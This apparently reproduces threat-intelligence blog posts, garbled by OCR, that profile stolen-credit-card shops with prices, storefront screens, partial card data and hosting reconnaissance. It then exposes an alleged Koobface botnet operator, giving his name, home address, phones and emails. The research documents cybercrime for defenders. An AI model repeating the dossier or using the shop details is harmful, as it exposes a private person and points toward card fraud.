Lookups SSN|MMN services, with the ability to Lookup MMN in California state. 
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Language: Ml py | Ml en @ |B ada money | ? £201 4 *@ 05 @ sian our 


[information | 
[Buy CC] 
LCC Orders | 
[Boy DUMPS) 
[ Buy Accounts | 
| Account Orders | 
[Checker | 
[Checker History | 
| Lookups SSN|MMN | 
L Proxy | 
{ Tickets | 
[Ask Question | 
Buy CC 
Buy CC 
Country Type State CC Have Valid rate 
USA (34053) ~ Visa + None > None + None + 
Zip List (like 32112, 324433, 0012, HQ4 WD7) 
© Expired lookup, current month(1011) 
Last 4 digits: 
Quantity: 1 F 
Founded 1 CC 
( SELECT THIS CHECKBOX TO CHECK ALL CC OR SELECT CHECKBOX NEAR CC YOU WANT TO CHECK J 
") Visa 428208 1013 Ebru covington USA CA 92110 random 0% none 25 
Total price: 2.50$ 
« , 
_Domain reconnaissance 
217.23.9.67 
ue. bz 
? Ns nsl.senicedns ni “_ ; AS 
“ "4 - 217.23.9.19 ‘to. 217.23.0.020 AS49981 
nsinodmeant 7 
217.23.9.196 
ns2.semicedns.ni + 
ta ns3.senicedns ni 4 173.192.225.208 A PIB. 173.192.225.204-static reverse sotayercom 
% ns4.semicedns ni a 173.192 225,216 “er 173.192.224.020 AS. AS36351 


173.192.225.216-static reverse. somayercom 
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cardshop.bz - 217.23.9.67 - Name_ server: nsl.servicedns.nl - Email: con- 
tact@privacyprotect.org; AS49981, WorldStream; HOSTED IN THE NETHERLANDS 


_CcMall.cc 

CcMall.cc is associated with the following ICQ number 777605, where potential buyers would 
have to connect with the seller in order to be offered the ability to register in the site. "For 
private limited registration only into the new shop" is currently displayed on CcMall.cc’s web 
site. 


_Domain reconnaissance 


4. 2135.70.34 


NET 
AS 
213.5.64.0/21 AS57172 
‘fer 


ux ux ng t.onlineshop.su 4 213.5.70.36 pte PTR 


<> NS PTR hosted-by.altushost.com 
A 


tr2.onlineshop.su 213.5.70.56 


uP 
cc 


ccmall.cc - 213.5.70.34 - Name_ server: TR1.ONLINESHOP.SU -— Email: gwyl- 
hcfktm@whoisservices.cn - AS49544, INTERACTIVE3D-AS - HOSTED IN THE NETHERLANDS; 
Name server: tr1.onlineshop.su - Emaill: exchangers@msn.com context.cx is also registered 
using exchangers@msn.com. 


_ccStore.ru 

ccStore.ru is associated with the following ICQ - 20606, and requires that a valid email address 
is supplied in order to activate the access to yet another interface for selling and reselling 
fraudulently obtained financial data. 
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Found a bug? We will pay! 
ccStore. ru Any innovation idea? We will pay you! 


You received a activation mail, please check your Inbox or Junk and click on the link to active your 
account. 


in case you didn't get the activation mail, change your email or use the Resend button on Account 
page. 
If you still did not get it, please use Support page to help you or ICQ: 20606 


Support is fa online 


Tickets 


© Create new ticket 


Ar this time you have no one ticket. You should to create a new one if you have any problems with our service usage 


Faq / Help 


_Domain reconnaissance 


91.220,101.200 
A 


85.17.0.0/16 AS. AS16265 
mail.ccstore,ru 
ux 


a $5.17.125.100 PTR. nosted-byleaseweb.com A 9517194120 
ns 952,1000dns.net 


mn prp, 212.113.36.21.d¢-ukrtelecom.ua 


ns1,1000dns.net & 212.113.36.21 va 
Ns 212.113.32.0/19 
ns3.1000dns.net ‘ Ps AS6849 
- 212.113.4812 NET 212.113.48.0/20 
fu 


PTR 
ut2.antiddos.org 


ccStore.ru - 91.220.101.200 - Name server: ns1.1000dns.net - Email: ccstoreru@yahoo.com - 
AS49704 - HOSTED IN THE NETHERLANDS 


Cv2Shop.com 


Cv2Shop.com has an inventory of 734 U.S based stolen credit cards for the price of Discovery 
- $2.2 per piece; Amex for $2; Mastercard for $2; Visa for $1.7 per piece. The fraudulent 
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interface is also offering 80 Canadian stolen credit cards for the price of $7 per piece for 
Discovery and Amex, and for $6 for Mastercard and $5 for Visa. 


CV2 Store 


Normal membe 


Support 


Category Description Warranty Visa Master Amex 6,2 NetOn line 


Valid 90% 


_Domain reconnaissance 


98.124.194.1 PIR NET 98.124.194.0/24 
A 
dns4.name-senices.com AS 
NS AS AS26415 
Gnsl.name-senices.com Pip S 98.124.1921 NEL 98,124.192.0/24 
N 
Gnss hame-senices.com pip 4. 98.124.196.1 NEL 98.124.196.0/24 
Le 
C — ev2shop.com > UE com we, 72-20.0.0/18 AS AS25761 
at 
72.20.12.205 PTE. mx205.emailovS12.com 
NS AS 
dns3.name-senices.com pt, S 98.124.193.1 NET 98.124.193,0/24 AS. AS21740 


NS 
PTR dns2.name-senices.com 


98.124.197.1 “A 
NEL 98.124.197,0/24 


cv2shop.com - 72.20.12.205 - Name server: DNS1.NAME-SERVICES.COM - Email: wn- 
fxgjdg@whoisprivacyprotect.com - AS25761, STAMINUS-COMM - HOSTED IN THE UNITED 
STATES 
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_FreshStock.biz 
FreshStock.biz is associated with the following ICQ - 607373112 where users have to initiate 
the contact in order to obtain access to the DIY shop for stolen credit cards.. 


ly FRESHST 0C K. B ee = Rees eh La 


a4 ~ 4. Straight Forward Structure. 


YOu RE $0 MONEY AND YOu DONT EVEN KNOW i iT. 5. Caring our Customers. 


LOG TO SYSTEM 


I] 1. Secured Connection. 


Gunane 


Copyright © Fresh Stock oett All Rights Reserved 
Page baded & 00 seconds 


_Domain reconnaissance 
freshstock.biz - 38.97.225.166; 69.175.73.184 - Name server - NS1.PIPEDNS.COM Email: 


ghmbfvntxs@whoisprivacyprotect.com - AS32475, SINGLEHOP, Inc. - HOSTED IN THE UNITED 
STATES 


_Magic-Numbers.cc 

Magic-Numbers.cc is associated with the following ICQ - 333277 and Jabber: elche@jabber.org 
where users wanting bulk orders have to contact the cybercriminals offering the DIY interface 
for stolen credit card numbers. 


The web site is currently offering 24642 U.S based stolen credit cards, followed by an- 
other 1545 Israeli based credit cards, with a total dumps currently being offered at 43,507. 
The most recent advertisements read: "Australia base, ultra virgin fresh base - track2 available. 
Approval rate 85 %" 
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Wy Otome for $9 


aon MAGIC 


Refill Balance 


8/1/2011 - SHOP WAS HACKED CHUA 28 


All my customers please remember that! mever come with another win and inever come to offer ny ZEALAND: 17 
you d¢p that’s a bullshit, i will take care of all tickets and i got that hacker out from this place.i  icrari 4545 

am sorry for all méssunderstandings and thx to the ones who were vigilent and reported this KOREA 472 
issue to admin forums. WORLD: 16770 


Submitted on Mon, OUOB201t - 68:31 
For bulk/mix packs, Please contact 

7/22/2011 - STOCK UPDATES our Support IcQ 

AUSTRALIA BASE - ULTRA VIRGIN FRESH BASE (22 7-au. 101-201-12) - track2 available @ ico: 333277 Jabber: etche@jadber.org 

(Approval rate 85%) We accept: 

122 pieces . 


Subentned on Fri, 2207/2014 «00.20 
Ag iver ty 


7/21/2011 - STOCK UPDATES 


NZ BASE - ULTRA VIRGIN FRESH BASE (21.7-nz 101-12) - tack2 only available 
(Approval rate 100%) 
62 pieces 


—ea, 


12.7-israel.101-t2 1479 1386 93 77 16 82.8% 


21.7-nz.101-t2 62 5 57 
eae eae ewe oa eee : es Sebeeel LS , epee Les ? seecl Lo Sasi - pa a 
ee eer es aes as ce aaa ae 


au only t2 70-80% 248 111 137 76 61 55.47% 


brasil1 only t2 90% 50 2 48 44 4 91.67% 


nz 101t295% 50 5 45 32 13 71.11% 
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BINS: Country: Bank: Code: Levet: 
(+$1) {*$1.5) (+$1) 


CredaDebit: Type: 


Base: 


[x] [Any (43507) [x] [Any 


ea) usa b2 t1[ x] 


[Any (435¢3] [Any (43553) [Any (43507) [ze] [ Any (43507) 


Cards found: 2047 


406315 oni2 UNITED STATES OF | NAVY FEDERAL CREDIT 
AMERICA UNION 

427178 owi2 UNITED STATES OF | REGIONS BANK 
AMERICA 

427178 oni2 UNITED STATES OF | REGIONS BANK 
AMERICA 

44478 owi2 UNITED STATES OF | CREDIT ONE BANK, 
AMERICA NATIONAL ASSOCIATION 

427178 oni2 UNITED STATES OF | REGIONS BANK 
AMERICA 

427178 owi2 UNITED STATES OF | REGIONS BANK 
AMERICA 

427178 oni2 UNITED STATES OF | REGIONS BANK 


AMERICA 
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ns3.1000dns.net 
NS 


ns1.1000dns.net 


91.223.77.35 
» 
es 
i 


mail magic-numbers.cc 


mail.antiddos.biz 


‘S 


N$2.1000dns.net 


| CLASSIC Oter 
| PLATINUM Det 
| 

| PLATINUM esr 
| 

+ 

PLATINUM CREDIT 

| PLATINUM Deer 
| PLATINUM OEBT 
| PLATINUM pest 


A 212.113.48.12 


4 212.113.3621 
MEE 93.223.77.0/24 

$135 antiddos.eu 
% 9121317589 


S- 921.213.175.129 
i 


4 85.17.125.100 


101 TRIsTRZ $15.00 
101 TRITRZ $30.00 
101 TRIsTR $30.00 
101 TRI-TR2 $30.00 
101 TRIeTRZ $30.00 
101 | TRIeTR2 | $30.00 
101 TRIsTRZ | $30.00 
ut2. anSddos.org 


"EL 212.113.498.020 
212.113.32.0/19 


PIR. 212.113.36.22.de.ukrtelecom.ua 


A 91.213.175.130 


fd 921.213.275.024 


rR hosted-byleaseweb.corn 


“s 85.17.0.0/16 


AS6849 


& 95,17.134.129 


AS 4s16265 


magic-numbers.cc - 91.213.175.89; 91.223.77.35 Name server: NS1.1000DNS.NET - Email: 
contact@privacyprotect.org - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE 


_Megad4u.biz 
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mega4u.biz is currently closed for free registration. 
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178.162.128.017 AB as28753 
1 


ot) 
7 Th La 4 y 
ATRIGZATETL gy Server 9475 santrex net 

~ 

NSLRCCINSWS why  95.2110131 

NS 


wer 
nr 95.2210006 & 4516265 
ASR LOCdNEWS Phy  #5.2120181 


megatunc 
Conta > Ai ns2 tems ws 


A 
od a 6964.33.27 “E 69.64.32.019 Ai. as300s3 
Stade ip-69-64-33-227 made imergenia ot” 


mai megatuce 
ut a 7846.44.67 “E 79.46.0.015 Ab 4524940 


ns teedns.ws 


mega4u.biz - 178.162.174.71 - Name server: NS1.FREEDNS.WS - Email: persiks@online.ua - 
AS28753, LEASEWEB-DE - HOSTED IN GERMANY 


_MyCc.su 

MyCc.su is associated with the following ICQ - 40040000 and next to offering stolen credit 
cards for sale, is also soliciting for security vulnerabilities - "Found a bug? We will pay!". The 
latest update from September 29 says that 1500 EU based stolen credit cards have been 
added, followed by another update from the same date, this time with 300 French based 
stolen credit cards added. 


The price of the stolen credit cards varies between $2 and $5 
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= 


Home 


If you want to get updates via ICQ add me : & 40040000 
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188.93.17.180 NET 188.93.16.0/22 AS aS49505 


mx1.deltahost.com.ua & 193.109.248.141 
Ux 193.109.248.0/23 


AS 
NS. ns1_.deltahostcom.ua 4 193.169.2441 ag 4521310 


NS 
‘ NET 193.189.126.0/23 
ns2.deltahostcom.ua S» 193.189.127.132 


uP 
su 


mycc.su - 188.93.17.180 - Name server: nsl.deltahost.com.ua - Email: admin@mycc.su - 
AS49505, SELECTEL Ltd. - HOSTED IN RUSSIA 


_Perfect-Numbers.cc 

Perfect-Numbers.cc is yet another DIY interface for purchasing stolen credit cards. It’s 
associated with teh following ICQ - 605099359. Users are able to search within the interface 
only after they have refilled their balance using Liberty Reserve as a means for payment. 


Neto Wy Otems for $0 


sonese: 3500 % PERFECT-NUMBERS.cC 


You can use our service only after you refill your balance! 
Refill your balance: 


Refill with Liberty Reserve 


Type the amount you want to add to your balance 


AMENtiOn we Cnarge eddmore! 5% for each varsection Deceuse of 
fees After each transaction you have to click on the “Return to 
merchant” button in ceder to Correctly add tunds to your balance! 
Refill 

$1000 of more you get: +10% 

$800 you get +£% 

$200 v get +2% 

Bonus will be automancally added after tarsaction 


i Liberty Reserve history 
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AS. AS49704 


NET 91.220.101.0/24 
91.220.101.75 


A 212.113.32.0/19 
NET 
AS 
ug, "52-2000dns.net S- 212,113,36,21 PTB. 212,113,36,21.de.ukrtelecom.ua ag 56849 
Tm, 
€ pertect-numbers.ce > NS ns3.1000dns.net Se 212.113.48.12 NEL 212.113.48.0/20 
— 
NS PIR 


Ns$2.1000dns.net ul2.antiddos.org 


up 4 
ce 85.17.125.100 NEL 95.17.0.0/16 AS. as16265 


rrr 
hosted-byleaseweb.com & 85.17.134.129 


perfect-numbers.cc - 91.220.101.75 - Name server: NS1.1000DNS.NET - AS49704, ADDOS-AS 
FOP Litvinenko Sergey Nikolaevich; icq: 605099359 - HOSTED IN THE NETHERLANDS 


_PrivateServices.ws 


privateservices.ws currently has a database of 634 U.K based stolen credit cards, and another 
293 French based stolen credit cards. 


GOS OUMA v1.0 Language: Qj oy | EB cn @ 890456 | @ Add moner | 7? £40 | | ~~ 0s @ San 


| information | 
[Buy CC] 
L Buy Accounts | 
| Account Order History | 
[ Chvecicer | 
[Checker History | 
[information Lookups | 
L Proxy | 
[ Tickets 
Ask question | 


Buy CC 


tere the 403330, 300000, SOBSSO 


Cosmtry Type State CC Have Vabd ree 


None = None + None = None © Nome © 
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Provence-Alpes-Cte dAzur (1) 

Bins MPromnce Apso Cre @WAzur (1) 
(1) 

RANCE (1) = 

ROUMANIE (1) 

SE 


» 


State CC Have Valid rate 


Zip List (like 32112, 324433, 0012, HQ4 WD7) 


“> 


© Expired lookup, current month(1011) 
Last 4 digits: 

Quantity: 1 

= 


Wwe We we eee, Seu LY, sewer 


Country Type State CC Have Valid rate 
United Kingdom (634) ~ None + none (2) ~ None + None ~ 


Zip List (ke 32112, 324433, 0012, HQ4 WD7) 


© Expired lookup, current month(1011) 
Last 4 digits: 

Quantty:; 1 

_ Search | 

Founded 1 CC 

©) check all 


Type Bin __ Expired CC Have Name Country State _Zip Lookup type __ Discount Memo 
none 


© Discover 675968 1111 MRTAHERON United Kingdom _ Cv344aP random 0% 
Total price: 8.00$ 


(By) 
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Proxy price 0.3$ 


United States 


ASAF / AMERICAS 
ASAF EUROPE 
ASAF PACIFIC 
CALIFORNIA 
COLORADO 
CONNECTICUT 


m 


DIST. COLUMBIA 


- DELAWARE 


KENTUCKY 
LOUISIANA 
MAINE 
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ux 


wx 


A 


ns S2.servicedns.nl 4 


prvatesenicesws > ” 
a n 


ns1.servicedns.nl 4 


uP 
A 


Check CC 


217.23.9.92 


NET 
217.23.9.196 NET 217.23.0.0/20 
NET 
217.23.9.19 <g—?TR nsi.nodmcani 


63.101.245,10 


AS. aS49981 


privateservices.ws - 217.23.9.92 - Name server: nsl.servicedns.nl - AS49981, WorldStream 
AS Maasdijk - HOSTED IN THE NETHERLANDS 


_pwnshop.cc 


pwnshop.cc is yet another DIY interface for selling stolen credit card numbers. The web site is 
currently returning the following message: "You can obtain registration code only from exist 
clients.Please be aware of scam - registration code is free for exist clients, so if you pay for it - 
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as for refund." 


REGISTRATION CODE 


You can obtain registration code only from exst chents 
3 
exis cients. So if you pay for it - as for refund 


@ be aware of scam - registration code is tree for 


User login Access denied 


Username: You are not authorized to access this page 


Password: 


Log in 
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174,37,196.55 
PTR 


ns2.atraid_org 
s 


NEL 77.79.12.0/23 


77.79.13.209 
A PTR 


hst-13-209.duomenucentras.|t 


up ce 
a 
MS nsi.atraid.org. pypm«( 23-197. 
ux 
mail.pwnshop.cc . 
MS 174.128.246.100 
ptr nS4.atraid.org 
174.128.246.102 
Ns 
ptr. S3.afraid.org 
72.20.15.62 
NET 
72.20.0.0/18 AS 9525761 


NET 174.37.192,0/18 


AS 
as AS36351 
AS16125 ag 
ney 50.23.192.0/18 
NET 
NET 174.128.246.0/24 AS. asa6a44 


pwnshop.cc - 77.79.13.209 - Name server: NS1.AFRAID.ORG - AS16125, DC-AS UAB - HOSTED 


IN LITHUANIA 
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_TrackStore.su 

trackstore.su is offering existing clients to option to refer additional customers for the price of 
$20 each. The web site is currently offering 1648 U.S based stolen credit cards, exclusively 
from the Suntrust Bank for the price of $10 for each stolen credit card. 


Hi T 
erate 7 Track2 System trackstore.su 
“gf 
tition hc saseisvareheeaaaonabiaraitarsa baraob-anesavaersitatermteamadinaabatoaunaanaitens 
Credit Cards | Announcement 
Free Tool | 2011-08-02 12:58:01 New Dumps Base Added 
Contact Us 2011-07-22 01:28:14 Track2 Update !! 
XY ime Baebes J { 2011-07-12 11:07:20 Huge Track2 Base Update 
(GasSSR ERDAS Rees Sean aa naan aaa >» ? 
' 2011-06-03 19:37:29 Make Money With TrackStore 
(Review.& CheckOut,) | 
SS cemrre soreness J 
Pits ce ae ee ceased f 
invite friends 
for 20§ 
per wctive accoust 


cs 
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a oo an ee a eo ee 


Nee aed wl 


ee ei ee 


| 
i 
Y 
: 
4 
i 
: 


{pee nce 
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NET §6.231.180.0/22 
66.231.180.140 


K PTR 
ns3_sitelutions.com 
NS 
,, nS2-sitelutions.com pp % 69.26.176.28 ME 69.26.176.0/24 
as AS 
46.21.148.26 MET 46.21.144.0/20 ‘S. as35017 ag, 4833597 
AS 
ug. 052Sitelutions.com pry 67.208.74.19 MEE 67.208.74.0/23 
yfS4-sitelutions.com rg 67.208.84.25 MET 67.208.90.0/21 
UP su 
y-in-127.1e100.net 
‘ 7 
altL.aspmxi.google.com % 74.125.45.27 _* NET 
74.125.44.0/23 
ux 
aspmx3.googlemail.com A NET 
74.125.127.27 74.125.126.0/23 
4 
Pp AS 
saialiaaieiaabia : 127.1¢100.net . AS15169 
pz-in- 2100.ne' 
ux rie A AS as 
aspmx2.googlemail.com S 74.125.43.27 NET 
ney 74-225.42.0/23 
Er 
bw-in-t26.1e100.net -py_-——‘e> 74.125.43.26 
a 209.85.228.0/23 
ux NET 
alt2.aspmxi.google.com 
wx a 209.85.229.26 —,—"T ww-in426.1e100.net & 216.239.32.26 
aspmx|.google.com 
NS 
nsS.sitelutions.com -pr_——be 69.93.94.154 NET 69.93.0.0/16 “ as2ie44 


trackstore.su - 46.21.148.26 - Email: rogersroy@yahoo.com - AS35017, SWIFTWAY-AS - 
HOSTED IN THE NETHERLANDS 


_Track2.name 
track2.name is offering stolen credit card numbers for the price of $20 for each stolen credit 
card. 
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| ; 


a707e0 freee” 808 oats 

370781 Boece” OE « ms 60 + databone? 
a7o7ez Sivece” 808 ao Mm #4 + = datebened 
sores Goes” oes . 20s ~ databene? 
370783 Brees” 800 > %  databawed 
a70783 femora 08 im |= ~ — databane2 
arores Qrrense* et ee % daeabaned 
370784 Sree” (0 2 as *  datebanez 
are Sirreee” 808 ee * danabaned 
370783 Smeme” 5 208 ~  databanez 
370789 Sirece” OPO > % databaned 
370785 ae £00 3 20s ~ daradaved 
arores Soese” non a % detabanes 
370706 Srrrece” 8 2 28 *  darabaned 

inerran = --« 
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91.213.175.024 
NET 


AS 
4 91.223.77.250 as AS6849 


PIR. sev 21.antiddos. biz 


91.213.175.121 
A 
wey. 212.123.32.0/21 
ng 981.1000dns.net & 212.113.36.21 


PIR 
NS 212.113.36.21.dc.ukrtelecom.ua 


ns2.1000dns.net 


up 85,17.125.100 MET 95.17.0.0/16 AS. a516265 
name PTR 
hosted-byleaseweb.com & 95.17.134.129 


track2.name - 91.213.175.121 - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE 


vzone.tc 

vzone.tc is yet another DIY shop for stolen credid card numbers. The current announcement 
reads : "Dear users, after you buy cards, to view proper information, please click download all 
cards or download selected card from My Cards page. It will show you all information like Last 
Name and all the additional info like phone, email. 


P.S If you dislike new shop V.2 of our shop, then please use support link and send us 
your feedback to admin, if you want to back old shop V.1 then send feedback with proper 
reasons why u again want to see old shop V.1" 


The current price for a stolen credit card is $1.80 for every card. Next to offering stolen 


credit cards as a service, the shop is also offering SSN and DOB Searcher, next to the opportu- 
nity for customers of the shop to also purchase proxies - compromised malware infected hosts. 
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WW ict Sic 


Home Buy Cards : My Cards Account Deposit Money Logout 


Welcom | Messages: 
Your Balance. -w.we 
Shopping Cart: 0 Cards(s) 


download cards after you buy 


r Users , Afte » * t tor +? @ chick & hy J all cards or dov 


ow u all 


, if you want 


| Thanks 


BIN (+$0.00) COUNTRY (+$0.00) STATE (+$0.00) CITY (+$0.00) ZIP (+$0.20) 


Bove 


AVAILABLE CARDS 


CARD 
NUMBER 


CATEGORY COUNTRY 
521404°***** (All Cards) 
552 (All Cards) 
528750° (All Cards) 
529115** (All Cards) 
542690° (All Cards) 
542039° (All Cards) 
511196****** (All Cards) 


511024°***** (All Cards) 


517805****** (All Cards) 


542416°***** (All Cards) 
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WA lie S mic 


Home Buy Cards My Cards Account Deposit Money Tools Support Logout 


SSN & DOB SEARCHER ~ ONLY LOSE CREDIT IF FOUND RESULT . Price per SSN: $3 ~ Price per DOB: $3 


Results are 99% accurate , We not refund balance if u get any wrong info , after you click search u'll see search result below (scroll down) 


First Name 
Last Name 
Middle Name 
City 
State Alabama iw} 


Search SSN/DOB Cancel 


Canada Chile 
Czech Republic Estonia 
Georgia 
Germany ong Kong Hungary 
India Indo Ireland 
Israel! Italy Japan 


Jordan C st = Kenya 


Korea, Republic of 
LUthusanis 
8, Republic of 

Morocco 
Phileppines 
Russian Federation 
Spain 

jan 
Ukraine 
Unknown 


Vietnam 


Filter Option: 


Domain 


IP mask (like 192.168.) 


Ping time (milliseconds) From 


City 
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Sort as 


Kyrgyzstan 


Macedonia 


Pakistan 
Poland 

Serbia 

Sweden 
Thailand 

United Kingdom 


Uzbekistan 


State (US only) 


Ping Time =| 


Latvia 
Malaysia 
Montene: 
Panama 
Romana 
Shoverna 
Switzerland 
Turkey 
United States 


Venezuela 


49.212.25.242 NET 49.212.0.0/16 AS. AS9371 


dns2.yandex.ru 

Bb tc 93.158.134.213 Mi wesmasntie 
NS 

; 


4B 
AS. AS13238 
PTR. dnsil.yandexru 


213.180.204.213 “A 


NET 
* 213.180.204.0/24 


vzone.tc - 49.212.25.242 - Name server: dnsl.yandex.ru - Email: adamsnames@rrpproxy.net 
- AS9371, SAKURA-C SAKURA Internet - HOSTED IN JAPAN 


_DumpsSheck.com 
dumpscheck.com is associated wit the following ICQ - 612303315 is an advanced checker for 


the validity of stolen credit card details. The web site says "Current merchant accepts VISA, 
MASTERCARD, AMEX, DISCOVER, DINERS, JCB." 


Checker 
Feel Free To Check Dumps 


(WS GATEWAY GATEWAY2 ADOFUNDS HISTORY SUPPORT SINBASE AUTH CODES REGION BINS LOGOUT 


ee USA payment processor 


Current merchant accepts VISA, MASTERCARD, AMEX, DISCOVER, DINERS, ICR 


© condom : |1.00- 10.00 [x] 
tate List feed: 00 cents(masornum $9 999, put mithout cents) 


Nt oemat 

=___—I “00 © OOOOOOOOOOOOE oo noneeeee (treck format, anf be Of 10 esp Gate etometiaty) 
os ,: JOO OOOOOOIIIE = hry 

n» wo KOOOCOCOCOOOOOX (tab or apace) Hh 


XHOOOOCOCOOOO [tab or space] Yh vy 


User Profile Latest news 
= Auth codes and responses August 14, 2011 
[Gate t) / Gate 2 Dernes Checker 


Lat of authenzeben resoonses 


~- Card GOOD (Approved) 
-- Card BAD (Nold-Call/Prck-Up) 


‘Checks | Amount -- Decined (sometmes may be approved thru other processors). 
GO EO) —~ Fem responses fer aute-recheck. Cost 0 credits. 
ny 7 — =» Our pre-auth system resporse. Cost 0 credes. 


o cm Refer To issuer 
“2 a) Refer To issuer - Specal Condition 


*“ No Reply lasuer Or Satch 1s Urawenlabie 


tA Acct Length Err Verfication Error 

7” Already Reversed Aireaty reversed at switch 

1 Amount Error trwalkd amount 

« Card No. Error tewoled Card Sumber 

2 Cashback Not Apo Camback bint exceeded 

etd Cashback Not Avi Carrback Service Not Awaladie 


DUMPSCHECK.COM 


MEMBER LOGIN el 
7 
’ 


y fy 
a )6/ 6h 
——— 
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ner 206.217.196.0/22 AS. aS4436 
_ 206,217.196,47 


a PIR 


vps.masswebsitemaker.com 
Mx Mx UP com 


¢ dumpscheckcom > 
ee NS 


nsl,dumpscheck.com 


NS 
ns2.dumpscheck.com 


dumpscheck.com - 206.217.196.47 - Name server: NS1.DUMPSCHECK.COM - Icq 612303315; 
AS4436, NLAYER Communications, Inc. - HOSTED IN THE UNITED STATES 


Related posts on the economics of cybercrime: 

[7]New report details the prices within the cybercrime market 
[8]CardCops: Stolen credit card details getting cheaper 

[9]Microsoft study debunks profitability of the underground economy 
[10]Are Stolen Credit Card Details Getting Cheaper? 

[11]Squeezing the Cybercrime Ecosystem in 2009 

[12]Price Discrimination in the Market for Stolen Credit Cards 
[13]The Underground Economy’s Supply of Goods 

[14]Microsoft study debunks phishing profitability 


This post has been reproduced from [15]Dancho Danchev’s blog. Follow him 
[16]Jon Twitter. 


1. http: //www.zdnet .com/blog/security/cardcops-stolen-credit-card-details-getting-cheaper/2084 
2. http: //ddanchev. blogspot .com/2008/07/are-stolen-credit-card-details-getting. htm 
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://ddanchev .blogspot.com/2008/06/price-discrimination-in-market-for.htm 


://www.zdnet .com/blog/security/scammers-introduce-atm-skimmers-with-built-in-sms-notification/2000 


://ddanchev .blogspot.com/2010/07/cybercriminals-sql-inject-cybercrime.htm 


://ddanchev .blogspot.com/2008/06/price-discrimination-in-market-for.htm 

://www.zdnet .com/blog/security/new-report-details-the-prices-within-the-cybercrime-market/8078 
://waw.zdnet.com/blog/security/cardcops-stolen-credit-card-details-getting-cheaper/2084 
://www.zdnet.com/blog/security/microsoft-study-debunks-profitability-of-the-underground-economy/3522 


ttp://ddanchev. blogspot .com/2008/07/are-stolen-credit-card-details-getting. htm 


11. http://ddanchev. blogspot .com/2009/01/squeezing-cybecrime-ecosystem-in-2009 htm 


ttp://ddanchev. blogspot .com/2008/06/price-discrimination-in-market-for.htm 


13. http://ddanchev. blogspot .com/2007/03/underground-economys- supply-of-goods.htm 


ttp://www.zdnet .com/blog/security/microsoft-study-debunks-phishing-profitability/2366 


15. http://ddanchev. blogspot .com/ 
16. http://twitter .com/danchodanche 


7.10.8 Exposing the Market for Stolen Credit Cards Data (2011-10-31 02:07) 


In this post, | will perform an OSINT analysis, exposing one of the key botnet masters behind 
the infamous Koobface botnet, that | have been [1]extensively profiling and infiltrating since 
day one. | will include photos of the botnet master, his telephone numbers, multiple email 
addresses, license plate for a BMW, and directly connect him with the infrastructure - now 
offline or migrated to a different place - of Koobface 1.0. 


The analysis is based on a single mistake that the botnet master made - namely using 
his personal email for registering a domain parked within Koobface’s command and control 
infrastructure, that at a particular moment in time was directly redirecting to the ubiquitous 
fake Youtube page pushed by the Koobface botnet. 


Let’s start from the basics. Here’s an excerpt from a [2]previous research conducted on 
the Koobface botnet: 


* r-d-cgpay-090709.com 
supermerd.org 


upr0306.com 78.110,160.0/20 ——“2-ge as42831 


www.r-d-cgpay-090709.com 


Zaebalinax.com 
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However, what the Koobface gang did was to register a new domain and use it as Koob- 
face C &C again parked at the same IP, which remains active - zaebalinax.com Email: 
krotreal@gmail.com - 78.110.175.15 - in particular zaebalinax.com/the/?pid=14010 
which is [3]Jredirecting to the Koobface botnet. Two more domains were also regis- 
tered and parked there, u15jul .com and umidsummer .com - Email: 2009polevan- 
drey@mail.ru which remain in stand by mode at least for the time being. 


The Koobface botnet master’s biggest mistake is using the Koobface infrastructure for 
hosting a domain that was registered with the botnet master’s personal email address. In this 
case that zaebalinax.com and krotreal@gmail.com. zaebalinax.com is literally translated 
to "Gave up on Linux". UPDATED: Multiple readers have to contacted me to point out that 
zaebalinax is actually translated to "f*ck you all" or "you all are p*ssing me off". 


The same email krotreal@gmail.com was used to [4ladvertise the sale of Egyptian 
Sphynx kittens on 05.09.2007: 


_krotreal@gmail.com 


The following telephone belonging to Anton was provided - +79219910190. The interest- 
ing part is that the same telephone was also used in [5]Janother advertisement, this time for 
the sale of a BMW: 
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139500" 


Copetomesd uetarrex 


AO70 6 MAP are NOM CocTomam Eonee 


NORD oO at UMHO MO TENE GoMy 


Photos of the BMW, offered for sale, by the same Anton that was using the Koobface in- 
frastructure to host zaebalinax.com Email: krotreal@gmail.com: 


21.3.2008 


auto.ru 


* ABTOMOGH NM 8 
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21.3.2008 


Oe AULO.LU 
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3 7 
w =, 21.3,.2008 


a pf iutO.) Ue 
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Upon further analysis, it becomes evident that his real name is Anton Nikolaevich Ko- 
rotchenko (AHTOH HukonaeBuy KopotueHko). Here are more details of this online activities: 


Real name: Anton Nikolaevich Korotchenko (AHTOH HukonaesBuy KopoT4ueHKo) 
City of origin: St. Petersburg 

Primary address: Omskaya st. 26-61; St. Petersburg; Leningradskaya oblast,197343 
Associated phone numbers obtained through OSINT analysis, not whois records: 
+79219910190 

+380505450601 

050-545-06-01 

ICQ - 444374 

Emails: krotreal@yahoo.com 

krotreal@gmail.com 

krotreal@mail.ru 

krotreal@livejournal.com 

newfider@rambler.ru 

WM identification (WEB MONEY) : 425099205053 

Twitter account: [6]@KrotReal; [7]@Real Koobface 

Flickr account: [8]KrotReal 

Vkontakte.ru Account: [9]KrotReal; [10]tonystarx 


Foursquare Account: [11]KrotReal 


Also, [12]a chat log from 2003, identifies KrotReal while he’s using the following IP - 
krotreal@ip-534.dialup.cl.spb.ru 


[13]How do you trigger a change that would ultimately affect the entire cybercrime 
ecosystem? By personalizing cybercrime. 
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Go through previous research conducted on the Koobface botnet: 
[14]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 
[15]The Koobface Gang Wishes the Industry "Happy Holidays" 
[16]Koobface Gang Responds to the "10 Things You Didn’t Know About the Koobface Gang Post" 
[17]10 things you didn’t know about the Koobface gang 

[18]How the Koobface Gang Monetizes Mac OS X Traffic 

[19]Koobface Botnet’s Scareware Business Model - Part Two 
[20]Koobface Botnet’s Scareware Business Model 

[21]From the Koobface Gang with Scareware Serving Compromised Site 
[22]Koobface Botnet Starts Serving Client-Side Exploits 
[23]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[24]Dissecting Koobface Gang’s Latest Facebook Spreading Campaign 
[25]Koobface - Come Out, Come Out, Wherever You Are 

[26]Dissecting Koobface Worm’s Twitter Campaign 

[27]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[28]Koobface Botnet Dissected in a TrendMicro Report 

[29]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[30]Movement on the Koobface Front - Part Two 

